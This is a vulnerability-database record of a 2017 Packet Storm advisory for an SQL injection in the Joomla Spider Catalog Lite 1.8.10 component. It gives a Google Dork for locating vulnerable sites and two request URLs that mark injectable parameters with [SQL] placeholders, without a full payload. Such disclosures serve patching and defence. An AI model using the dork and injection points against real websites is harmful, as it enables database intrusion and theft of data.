{"id": "PACKETSTORM:141136", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Joomla Spider Catalog Lite 1.8.10 SQL Injection", "description": "", "published": "2017-02-16T00:00:00", "modified": "2017-02-16T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/141136/Joomla-Spider-Catalog-Lite-1.8.10-SQL-Injection.html", "reporter": "Ihsan Sencan", "references": [], "cvelist": [], "lastseen": "2017-02-18T17:05:11", "viewCount": 16, "enchantments": {"score": {"value": 0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "sourceHref": "https://packetstormsecurity.com/files/download/141136/joolaspidercl1810-sql.txt", "sourceData": "`# # # # # \n# Exploit Title: Joomla! Component Spider Catalog Lite v1.8.10 - SQL Injection \n# Google Dork: inurl:index.php?option=com_spidercatalog \n# Date: 16.02.2017 \n# Vendor Homepage: http://web-dorado.com/ \n# Software Buy: https://extensions.joomla.org/extensions/extension/directory-a-documentation/directory/spider-catalog-lite/ \n# Demo: http://demo.web-dorado.com/spider-catalog.html \n# Version: 1.8.10 \n# Tested on: Win7 x64, Kali Linux x64 \n# # # # # \n# Exploit Author: Ihsan Sencan \n# Author Web: http://ihsan.net \n# Author Mail : ihsan[@]ihsan[.]net \n# # # # # \n# SQL Injection/Exploit : \n# http://localhost/[PATH]/index.php?option=com_spidercatalog&product_id=40&view=showproduct&page_num=1&back=1&show_category_details=0&display_type=list&show_subcategories=0&show_subcategories_products=0&show_products=1&select_categories=0&Itemid=[SQL] \n# \nhttp://localhost/[PATH]/index.php?option=com_spidercatalog&view=spidercatalog&select_categories=[SQL]&show_category_details=1&display_type=cell&show_subcategories=1 \n# # # # # \n \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647040572, "score": 1659770509}}
{}
Joomla Spider Catalog Lite 1.8.10 SQL Injection